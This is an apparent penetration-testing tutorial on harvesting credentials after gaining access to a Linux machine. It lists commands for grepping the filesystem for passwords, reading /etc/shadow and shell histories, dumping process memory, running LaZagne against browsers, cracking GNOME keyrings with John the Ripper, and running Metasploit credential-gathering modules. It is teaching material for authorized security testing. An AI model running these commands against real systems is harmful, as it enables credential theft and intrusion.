Linux Privilege Escalation – Credentials Harvesting
Introduction
Linux-based operating systems and applications often store clear text, encoded or hashed credentials in files or in memory.
When gaining initial access to a Linux machine and performing privilege escalation enumeration steps, often passwords can be found through these means and they can be used to further escalate privileges.
There are various methods to harvest credentials in a Linux system in order to escalate privileges, the following ones are the most common and they are always worth a try.
Finding passwords in files
One of the first things to do is to search for files containing the “password” or “passwd” string, or configuration files containing authentication information, as this could help in identifying hidden credentials:
- grep –color=auto -rnw ‘/’ -ie “PASSWORD\|PASSWD” –color=always 2> /dev/null
- find . -type f -exec grep -i -I “PASSWORD\|PASSWD” {} /dev/null \;
- locate config.php
- locate password; locate passwd
- cat /var/mail/*; cat var/spol/mail
- locate config.
- crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron; cat /etc/cron; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny; cat /etc/crontab; cat /etc/anacrontab; cat /var/spool/cron/crontabs/root
Bash History
Bash and other scripting languages, along with various services often store previous commands run in the system, which could contain clear-text or encoded passwords if they are hard-coded in the command itself:
- find / -name *_history -xdev 2> /dev/null
Check for Hashes Stored in Passwd/Shadow
The /etc/passwd file used to store user hashes although it no longer does, as these are now stored in the /etc/shadow file. The reason why this was changed is that some of the information stored in the /etc/passwd file has to be world-readable for the operating system to operate correctly, so hashes were moved to the shadow file which is normally only accessible by root. Hashes may still be stored in /etc/passwd as it is backward compatible.
- find / -name passwd -xdev 2>/dev/null; find / -name shadow -xdev 2>/dev/null
- cat /etc/passwd; cat /etc/shadow
Old passwords in /etc/security/opasswd
The /etc/security/opasswd file is used by pam_cracklib (a module used in Linux to ensure a good password policy is in place) to store the hashed version of old passwords used on the system to prevent users from reusing the same ones over and over again.
- cat /etc/security/opasswd
- find / -name opasswd -xdev 2>/dev/null
Recently Modified Files
It can be useful to check files that were modified recently, as they may be containing useful information and/or credentials. The following command will find standard files modified in the last 30 minutes:
- find / -mmin -30 -xdev 2>/dev/null
Credentials Stored in Memory
Services will sometimes store the credentials entered by the end user in clear text in memory. The commands below can help find credentials stored in processes:
- strings /dev/mem -n10 | grep -ie “PASSWORD|PASSWD” –color=always
or with GDB:
- ps -ef | grep [service name] (find process id)
- gdb -p [process id)
- info proc mappings
- q
- dump memory /tmp/process<START_HEAD> <END_HEAD>
- q
- strings /tmp/process
You can also use the following tools to dump the system memory and find clear-text credentials stored within it:
Credentials Stored in Browsers
Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed. Lazagne is an open source application used toretrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.
Command | Description |
laZagne.py all | Launch all modules |
laZagne.py browsers | Launch only a specific module |
laZagne.py browsers -firefox | Launch a specific software script |
laZagne.py -h laZagne.py browsers -h | Get help |
laZagne.py all -vv | Change verbosity mode (2 different levels) |
GNOME Keyring
GNOME Keyring is a software application designed to store security credentials such as usernames, passwords, and keys. The sensitive data is encrypted and stored in a keyring file in the user’s home directory. It can be found through the following command:
- locate login.keyring; locate user.keystore
John the Ripper can then be used to extract and crack the hashes and reveal the actual password:
- /usr/share/john/keyring2john.py login.keyring > hashes.txt
- /usr/share/john/keystore2john.py user.keystore
- john –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
MimiPenguin and the post/linux/gather/gnome_keyring_dump Metasploit module can also be used to perform this task.
Additional Metasploit Modules
There are certain Metasploit modules that aim at to find clear-text or encoded credentials in a target system:
- use post/linux/gather/enum_system
- use post/linux/gather/enum_users_history
- use post/linux/gather/gnome_commander_creds
- use post/linux/gather/hashdump
- use post/linux/gather/gnome_keyring_dump
- use post/linux/gather/enum_psk
- use post/linux/gather/enum_configs
- use post/linux/gather/ecryptfs_creds
- use post/linux/gather/mount_cifs_creds
- use post/linux/gather/openvpn_credentials
- use post/linux/gather/phpmyadmin_credsteal
- use post/linux/gather/pptpd_chap_secrets
- use post/linux/gather/tor_hiddenservices
- use post/multi/gather/filezilla_client_cred
- use post/multi/gather/firefox_creds
- use post/multi/gather/gpg_creds
- use post/multi/gather/grub_creds
- use post/multi/gather/irssi_creds
- use post/multi/gather/lastpass_creds
- use post/multi/gather/maven_creds
- use post/multi/gather/netrc_creds
- use post/multi/gather/pgpass_creds
- use post/multi/gather/pidgin_cred
- use post/multi/gather/remmina_creds
- use post/multi/gather/rsyncd_creds
- use post/multi/gather/ssh_creds
- use post/multi/gather/thunderbird_creds
Conclusion
Exposed passwords are a very common method of intrusion and privilege escalation, and although it’s not as common nowadays since most applications use encryption, it’s something that should not be overlooked.
Automated enumeration scripts will also perform credential harvesting although it’s always best to do this manually.